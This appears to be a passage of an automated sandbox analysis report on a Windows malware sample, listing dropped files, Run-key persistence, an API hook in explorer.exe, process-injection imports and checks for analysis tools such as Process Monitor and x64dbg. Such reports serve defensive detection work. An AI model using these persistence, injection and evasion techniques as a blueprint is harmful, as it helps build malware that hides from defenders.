                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD61220 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,SetFileAttributesW,SetFileAttributesW,CreateProcessW,CloseHandle,CloseHandle,CreateProcessW,CloseHandle,CloseHandle,0_2_00007FF79CD61220
                  Source: systemsx.exe.0.drStatic PE information: section name: .x64
                  Source: Grabber.exe.0.drStatic PE information: section name: .code
                  Source: 616766F8886C145454191.exe.1.drStatic PE information: section name: .x64
                  Source: 12DB.tmp.update.exe.7.drStatic PE information: section name: .x64
                  Source: libcrypto-1_1.dll.20.drStatic PE information: section name: .00cfg
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF79483DCC2 push rbp; iretd 1_2_00007FF79483DCC3
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF79483DEC1 push rcx; iretd 1_2_00007FF79483DEC2
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF79483DE70 push 00000041h; ret 1_2_00007FF79483DE74
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF79483DE59 push rbp; iretd 1_2_00007FF79483DE5A
                  Source: C:\Windows\System32\svchost.exeCode function: 6_2_00007FF7E52BDE70 push 00000041h; ret 6_2_00007FF7E52BDE74
                  Source: C:\Windows\System32\svchost.exeCode function: 6_2_00007FF7E52BDE59 push rbp; iretd 6_2_00007FF7E52BDE5A
                  Source: C:\Windows\System32\svchost.exeCode function: 6_2_00007FF7E52BDCC2 push rbp; iretd 6_2_00007FF7E52BDCC3
                  Source: C:\Windows\System32\svchost.exeCode function: 6_2_00007FF7E52BDEC1 push rcx; iretd 6_2_00007FF7E52BDEC2
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B737D6 push rsi; ret 7_2_08B737D7
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: 11_2_00007FF7DBD5DCC2 push rbp; iretd 11_2_00007FF7DBD5DCC3
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: 11_2_00007FF7DBD5DEC1 push rcx; iretd 11_2_00007FF7DBD5DEC2
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: 11_2_00007FF7DBD5DE59 push rbp; iretd 11_2_00007FF7DBD5DE5A
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: 11_2_00007FF7DBD5DE70 push 00000041h; ret 11_2_00007FF7DBD5DE74
                  Source: C:\Windows\System32\audiodg.exeCode function: 13_2_00007FF7A91BDE59 push rbp; iretd 13_2_00007FF7A91BDE5A
                  Source: C:\Windows\System32\audiodg.exeCode function: 13_2_00007FF7A91BDE70 push 00000041h; ret 13_2_00007FF7A91BDE74
                  Source: C:\Windows\System32\audiodg.exeCode function: 13_2_00007FF7A91BDCC2 push rbp; iretd 13_2_00007FF7A91BDCC3
                  Source: C:\Windows\System32\audiodg.exeCode function: 13_2_00007FF7A91BDEC1 push rcx; iretd 13_2_00007FF7A91BDEC2
                  Source: C:\Windows\System32\msiexec.exeCode function: 14_2_00007FF775AEDEC1 push rcx; iretd 14_2_00007FF775AEDEC2
                  Source: C:\Windows\System32\msiexec.exeCode function: 14_2_00007FF775AEDCC2 push rbp; iretd 14_2_00007FF775AEDCC3
                  Source: C:\Windows\System32\msiexec.exeCode function: 14_2_00007FF775AEDE70 push 00000041h; ret 14_2_00007FF775AEDE74
                  Source: C:\Windows\System32\msiexec.exeCode function: 14_2_00007FF775AEDE59 push rbp; iretd 14_2_00007FF775AEDE5A
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B832FAED push rdi; ret 21_2_00007FF8B832FAF4
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B832A096 push rdi; ret 21_2_00007FF8B832A0A2
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8330200 push rdi; ret 21_2_00007FF8B8330206
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B832A5B5 push rdi; ret 21_2_00007FF8B832A5BB
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB9CB1B push rbp; retf 21_2_00007FF8BFB9CB28
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\libffi-7.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\ucrtbase.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\_bz2.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\_hashlib.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\select.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeFile created: C:\Users\user\Desktop\Grabber.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\_lzma.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\VCRUNTIME140.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\unicodedata.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\libcrypto-1_1.dllJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeFile created: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\_socket.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\python38.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\12DB.tmp.update.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\_ctypes.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeFile created: C:\Users\user\AppData\Roaming\systemsx.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServicesJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\System32\audiodg.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                  Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessInternalW new code: 0xE9 0x90 0x00 0x07 0x75 0x5F
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B5590 LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_0E8B5590
                  Source: C:\Users\user\Desktop\Grabber.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_11-1200
                  Source: C:\Windows\System32\msiexec.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                  Source: C:\Windows\System32\msiexec.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                  Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_6-1146
                  Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_6-1442
                  Source: C:\Windows\System32\audiodg.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_11-1474
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_1-1200
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-1438
                  Source: C:\Windows\System32\audiodg.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: systemsx.exe, svchost.exe, 616766F8886C145454191.exe, audiodg.exe, msiexec.exeBinary or memory string: PROCESSHACKER.EXE
                  Source: systemsx.exe, svchost.exe, 616766F8886C145454191.exe, audiodg.exe, msiexec.exeBinary or memory string: PROCMON.EXE
                  Source: systemsx.exe, svchost.exe, 616766F8886C145454191.exe, audiodg.exe, msiexec.exeBinary or memory string: X64DBG.EXE
                  Source: systemsx.exe, svchost.exe, 616766F8886C145454191.exe, audiodg.exe, msiexec.exeBinary or memory string: AUTORUNS.EXE
                  Source: msiexec.exe, 00000013.00000002.2243622840.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: ZEROX64MADE IN ALGERIA <3REFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNGQGWZDSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDER.EXELOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLWCSCPYMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLGETWINDOWSDIRECTORYWKERNEL32.DLLGETVOLUMEINFORMATIONWKERNEL32.DLLLSTRCATWKERNEL32.DLLSETFILEATTRIBUTESWKERNEL32.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLDELETEFILEWKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGET
